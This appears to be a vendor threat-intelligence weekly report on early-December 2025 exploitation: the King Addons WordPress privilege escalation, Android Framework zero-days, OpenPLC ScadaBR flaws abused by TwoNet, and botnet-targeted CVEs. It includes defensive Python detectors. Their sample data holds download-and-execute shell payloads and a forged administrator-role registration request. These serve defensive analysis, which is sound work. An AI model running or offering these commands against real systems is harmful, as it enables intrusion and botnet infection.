December Starts with Intensified Cyberattacks Across Mobile and Industrial Systems

December 5, 2025

Executive Summary

As December began, exploitation activity intensified across mobile, industrial, and web ecosystems. CISA added 4 new vulnerabilities to its KEV catalog, including Android Framework vulnerabilities and two long-standing OpenPLC ScadaBR flaws now linked to real-world attacks. The King Addons for Elementor WordPress plugin also came under active exploitation, affecting more than 10,000 sites.  

Botnet operators like EnemyBot, Sysrv-K, Andoryu, and Androxgh0st escalated campaigns against exposed cloud services, routers, and web applications, taking advantage of configuration gaps and outdated systems.  

Forescout further reported that the pro-Russian group TwoNet exploited ScadaBR vulnerabilities, highlighting the ongoing risk to industrial environments running legacy components.

Key points:

  • 4 vulnerabilities added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity.
  • King Addons for Elementor WordPress plugin vulnerability actively exploited.
  • Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.
  • 2 vulnerabilities exploited by a pro-Russian hacktivist group.
  • Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

What are the top trending or critical vulnerabilities observed this week?

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2025-8489 - Privilege Escalation Vulnerability in the King Addons for Elementor plugin for WordPress

A Privilege Escalation Vulnerability in the King Addons for Elementor - Free Elements, Templates, and Features plugin for WordPress allowed unauthenticated attackers to create administrator-level accounts, impacting versions 24.12.92 through 51.1.14 and more than 10,000 active installations. Wordfence patched the flaw in version 51.1.35 after determining that insecure input handling in the handle_register_ajax() function enabled attackers to specify user_role=administrator during registration, resulting in complete site compromise, including malicious file uploads, traffic redirection, and unauthorized content manipulation. Exploitation began on October 31, 2025, with over 48,400 blocked attempts recorded by Wordfence, primarily originating from IP addresses such as 45.61.157[.]120, 2602:fa59:3:424::1, 182.8.226[.]228, 138.199.21[.]230, and 206.238.221[.]25. Site administrators are strongly encouraged to update the plugin to the latest patched version, review their WordPress installations for any unauthorized administrator accounts, and closely monitor logs and site behavior for indicators of compromise or unusual activity.
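As an added example (not code from the report, Wordfence or the plugin), the following Python flags registration requests that carry a client-chosen user_role, the abuse pattern described above, and lists administrator accounts that warrant review. The request-log format, the action=register parameter and the sample users are assumptions; the source IPs and the October 31, 2025 start date are the ones quoted in the text.

```python
import re
from datetime import date
from urllib.parse import parse_qs

# Constructed log format: <client_ip> "<METHOD> <path>" "<url-encoded body>"
LOG_RE = re.compile(r'^(\S+) "([A-Z]+) (\S+)" "(.*)"$')

# Source IPs the report attributes to the campaign (refanged from the text).
KNOWN_SOURCES = {"45.61.157.120", "2602:fa59:3:424::1", "182.8.226.228",
                 "138.199.21.230", "206.238.221.25"}
EXPLOITATION_START = date(2025, 10, 31)  # first exploitation seen by Wordfence

def parse_line(line):
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ip, method, path, body = m.groups()
    return {"ip": ip, "method": method, "path": path,
            "params": {k: v[0] for k, v in parse_qs(body).items()}}

def classify(rec):
    """Findings for one request; a client-chosen role is the CVE-2025-8489 pattern."""
    findings = []
    role = rec["params"].get("user_role")
    if rec["path"].endswith("/wp-admin/admin-ajax.php") and role is not None:
        findings.append("client-supplied user_role=" + role)
    if rec["ip"] in KNOWN_SOURCES:
        findings.append("source IP listed in the campaign data")
    return findings

def scan(lines):
    return [(rec["ip"], f) for rec in map(parse_line, lines) if rec
            for f in classify(rec)]

def audit_admins(users, approved):
    """Admin logins outside the approved set or created since exploitation began."""
    return sorted(u["login"] for u in users if u["role"] == "administrator"
                  and (u["login"] not in approved
                       or u["registered"] >= EXPLOITATION_START))

# Constructed samples; the AJAX action name is assumed, not from the report.
SAMPLE_LOG = [
    '203.0.113.7 "POST /wp-admin/admin-ajax.php" "action=register&user_login=bob"',
    '45.61.157.120 "POST /wp-admin/admin-ajax.php" '
    '"action=register&user_login=x&user_role=administrator"',
]
SAMPLE_USERS = [
    {"login": "owner", "role": "administrator", "registered": date(2024, 1, 5)},
    {"login": "x", "role": "administrator", "registered": date(2025, 11, 2)},
]
```

Any hit from scan() on a registration endpoint, or any login returned by audit_admins(), is a lead for the manual review the advisory recommends, not proof of compromise on its own.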

CVE-2025-48572 - Elevation of Privilege Vulnerability in Android Framework

An Elevation of Privilege Vulnerability in the Android Framework component, affecting versions 13 through 16, was identified as being exploited in targeted attacks prior to patch availability. Google did not disclose technical details about the exploitation method, whether the flaw was used individually or as part of a chained attack, nor did it attribute the activity to any specific threat actor. Evidence referenced in the advisory indicated limited, targeted abuse in the wild, suggesting that attackers had already begun leveraging the vulnerability in focused operations before the December 2025 security update. This vulnerability was recently added to the CISA KEV catalog, underscoring its significance and the urgency of applying available fixes.  

CVE-2025-48633 - Information Disclosure Vulnerability in Android Framework

An Information Disclosure Vulnerability in the Android Framework component, impacting versions 13, 14, 15, and 16, was also found to be under active, targeted exploitation prior to Google’s December 2025 security release. Google did not provide technical specifics about how the flaw was abused, whether it was combined with other vulnerabilities, or the extent of the activity, and no attribution was made to any known threat actor. Advisory notes indicated that available evidence pointed to limited, focused exploitation in the wild, suggesting attackers had already begun extracting sensitive data through this flaw before patches were issued. The vulnerability has since been added to the CISA KEV catalog, reinforcing the need for immediate remediation.  

CVE-2021-26828 - Unrestricted Upload of File with Dangerous Type Vulnerability in OpenPLC ScadaBR

An Unrestricted Upload of File with Dangerous Type Vulnerability in OpenPLC ScadaBR allowed remote authenticated users to upload and execute arbitrary JSP files through the view_edit.shtm interface, enabling full server-side code execution. The flaw was recently tied to real-world exploitation after Forescout observed the pro-Russian hacktivist group TwoNet abusing it in September 2025 against a honeypot they believed to be a water treatment facility, using the access to deploy malicious scripts, disable logs and alarms, and alter system settings. With a proof-of-concept publicly available and confirmed exploitation in the wild, the vulnerability has since been added to the CISA KEV catalog.

CVE-2021-26829 - Cross-Site Scripting Vulnerability in OpenPLC ScadaBR

A Cross-Site Scripting Vulnerability in OpenPLC ScadaBR, exploitable via system_settings.shtm and affecting versions through 0.9.1 on Linux and 1.12.4 on Windows, has no official vendor patch and was recently linked to real-world exploitation. Forescout reported that in September 2025 the pro-Russian hacktivist group TwoNet targeted its honeypot, which the group mistook for a water treatment facility, and used the flaw to inject malicious scripts, disable logs and alarms, and modify system settings. The vulnerability allowed arbitrary script execution in the browsers of authenticated users, enabling session hijacking, credential theft, and unauthorized configuration changes within SCADA environments. Following confirmation of active abuse, the flaw was subsequently added to the CISA KEV catalog.

What did Cytellite sensors detect this week?

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

| Vulnerability | Product | Severity | Title | Exploited in-the-wild | CISA KEV |
|---|---|---|---|---|---|
| CVE-2025-31324 | SAP NetWeaver | Critical | Unrestricted Vulnerability in SAP NetWeaver | True | True |
| CVE-2024-47176 | CUPS | Medium | Improper Input Validation Vulnerability in OpenPrinting cups-browsed through 2.0.1 leads to remote code execution | True | False |
| CVE-2024-4577 | PHP-CGI on Windows | High | Critical Argument Injection Vulnerability in PHP on Windows servers | True | True |
| CVE-2024-3721 | TBK DVR Devices | Medium | OS Command Injection Vulnerability in TBK DVR-4104 and DVR-4216 up to 20240412 | True | False |
| CVE-2024-3400 | Palo Alto Networks PAN-OS | Critical | Command Injection Vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS | True | True |
| CVE-2024-27348 | Apache HugeGraph-Server | Critical | Improper Access Control Vulnerability in Apache HugeGraph-Server | True | True |
| CVE-2024-1709 | ConnectWise ScreenConnect | Critical | Authentication Bypass Vulnerability in ConnectWise ScreenConnect leads to sensitive information disclosure | True | True |
| CVE-2023-33831 | FUXA | Critical | Unauthenticated Remote Code Execution in FUXA's scripting component | True | False |
| CVE-2023-26801 | LB-LINK devices | Critical | Command Injection Vulnerability in LB-LINK Wireless routers | True | False |
| CVE-2022-47945 | ThinkPHP Framework | Critical | Path Traversal Vulnerability in ThinkPHP Framework leads to arbitrary code execution | True | False |

What botnet activity was observed this week?

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

| Vulnerability | Product | Title | Exploit | Abused by Botnet |
|---|---|---|---|---|
| CVE-2022-22947 | Spring Cloud Gateway | Remote Code Execution Vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | EnemyBot, Sysrv-K |
| CVE-2021-22205 | Gitlab-Exiftool | Remote Code Execution Vulnerability in Gitlab-Exiftool | True | Andoryu |
| CVE-2017-9841 | Util/PHP/eval-stdin.php in PHPUnit | Arbitrary PHP Code Execution Vulnerability in Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 | True | AndroxGh0st |
| CVE-2016-10372 | Eir D1000 modem | Improper Protocol Access Control Vulnerability in Eir D1000 modem | True | Bashlite, BrickerBot, Tsunami, Mirai |
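As an added example, not taken from the report or from MISP, this Python classifies captured request payloads for the pattern the text describes as indicative of botnet activity: a wget or curl invocation pointing at a literal IP address, usually followed by a stage that makes the fetched file executable and runs it. The sample payloads are constructed using documentation IP ranges.

```python
import re
from urllib.parse import unquote_plus

# Downloader invocation whose target host is a literal IPv4 address: the
# payload shape the report cites as indicative of botnet propagation.
DOWNLOAD_RE = re.compile(
    r'\b(?P<tool>wget|curl|tftp)\b[^;|&\n]*?'
    r'(?P<host>(?:\d{1,3}\.){3}\d{1,3})(?::\d+)?(?P<path>/\S*)?'
)
# Follow-on stage that marks the fetched file executable or runs it.
EXEC_RE = re.compile(r'\bchmod\s+\S+|\bsh\s+\S+|\./\S+')

def analyze_payload(raw):
    """Classify one captured request body; returns None if no downloader+IP seen."""
    text = unquote_plus(raw)          # sensors often store the raw encoded body
    m = DOWNLOAD_RE.search(text)
    if not m:
        return None
    execute = EXEC_RE.search(text[m.end():]) is not None
    return {"tool": m["tool"], "host": m["host"], "path": m["path"] or "/",
            "execute_stage": execute,
            "verdict": "download-and-execute" if execute else "download-only"}

def summarize(payloads):
    """Count download-and-execute payloads per staging host across a batch."""
    hosts = {}
    for raw in payloads:
        r = analyze_payload(raw)
        if r and r["execute_stage"]:
            hosts[r["host"]] = hosts.get(r["host"], 0) + 1
    return hosts

# Constructed samples using documentation IP ranges, not sensor data from the report.
SAMPLE_PAYLOADS = [
    "cd /tmp; wget http://198.51.100.23/bins/x86 -O x; chmod +x x; ./x",
    "cmd=cd+%2Ftmp%3Bcurl+http%3A%2F%2F203.0.113.9%3A8080%2Fbot.sh+-o+b.sh%3Bsh+b.sh",
    "wget http://198.51.100.23/bins/mips",          # fetch with no execute stage
    "wget https://updates.example.com/pkg.tar.gz",  # hostname, not a literal IP
    "ping -c 1 203.0.113.9",                        # no downloader at all
]
```

The per-host counts from summarize() are what a sensor team would pivot on, since one staging host typically serves binaries for many architectures and many CVEs.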

Which vulnerabilities were abused by malware this week?

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.

Exploitation of OpenPLC ScadaBR vulnerabilities by TwoNet Hacktivists

According to Forescout, the OpenPLC ScadaBR vulnerabilities came under real-world exploitation in September 2025 when TwoNet, a pro-Russian hacktivist group known for DDoS attacks, website defacements, and operations against critical infrastructure, targeted a honeypot it mistakenly believed was a water treatment facility. After gaining initial access using default credentials, the attackers conducted reconnaissance, established persistence by creating a new user account named “BARLATI,” and exploited the flaws to deface the HMI login page with the message “Hacked by Barlati.” They also modified system settings to disable logs and alarms, unaware the system was a decoy. This incident reinforces the need for continuous monitoring, credential hardening, and proactive defense across industrial environments still relying on outdated technologies.

| Vulnerability | Severity | Title | Patch | Targeted By Malware | OSS |
|---|---|---|---|---|---|
| CVE-2021-26828 | High | Unrestricted Upload of File with Dangerous Type Vulnerability in OpenPLC ScadaBR | Yes | TwoNet Hacktivist Group | False |
| CVE-2021-26829 | Medium | Cross-Site Scripting Vulnerability in OpenPLC ScadaBR | No | TwoNet Hacktivist Group | False |

Were any PRE-NVD vulnerabilities identified this week?

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

| CVE-ID | Type of vulnerability | Product | Reference |
|---|---|---|---|
| CVE-2025-12548 | Missing Authentication for Critical Function | Red Hat OpenShift Dev Spaces | Resource |
| CVE-2025-13392 | Authentication Bypass | Synology DiskStation DS925+ | Resource |
| CVE-2025-13716 | Arbitrary Code Execution | Tencent MimicMotion | Resource |
| CVE-2025-48572 | Elevation of Privilege | Android Framework Component | Resource |

Conclusion

December’s early activity demonstrated how quickly attackers are shifting toward vulnerabilities in mobile platforms, legacy industrial systems, and widely used web applications, often exploiting weaknesses long before defenders can react. The continued abuse of OpenPLC ScadaBR flaws, rapid targeting of Android zero-days, and escalating botnet campaigns reinforce that visibility and timely intelligence are now essential, not optional. Loginsoft Vulnerability Intelligence (LOVI) delivers real-time insight into active exploitation, helping organizations prioritize what truly matters, respond faster, and stay ahead of evolving threat patterns.

FAQs:

1) What is OpenPLC ScadaBR?

A) OpenPLC ScadaBR is an open-source SCADA platform used for monitoring and controlling industrial automation systems. It provides HMIs, device management, and data visualization for PLC-based environments. Because many deployments run outdated or unsupported versions, it has become a frequent target for attackers exploiting legacy industrial systems.

2) Why do WordPress plugins remain a high-risk vector for exploitation?

A) Plugins are widely used, inconsistently maintained, and often run with high privileges, allowing a single vulnerable component to provide attackers with full administrative control over a site.

3) What does “PoC available” mean, and why does it increase risk for a vulnerability?

A) “PoC available” means a working exploit for the vulnerability has been publicly released, proving it can be abused. This helps defenders test and validate fixes, but it also gives attackers a ready-made blueprint, often leading to rapid and widespread exploitation if systems remain unpatched.

4) Why do attackers continue to exploit older vulnerabilities even when patches exist?

A) Attackers frequently target outdated or unpatched systems because many organizations delay updates, run legacy equipment, or rely on unsupported software. These gaps create predictable entry points that threat actors can exploit with minimal effort, making old vulnerabilities just as dangerous as new ones.
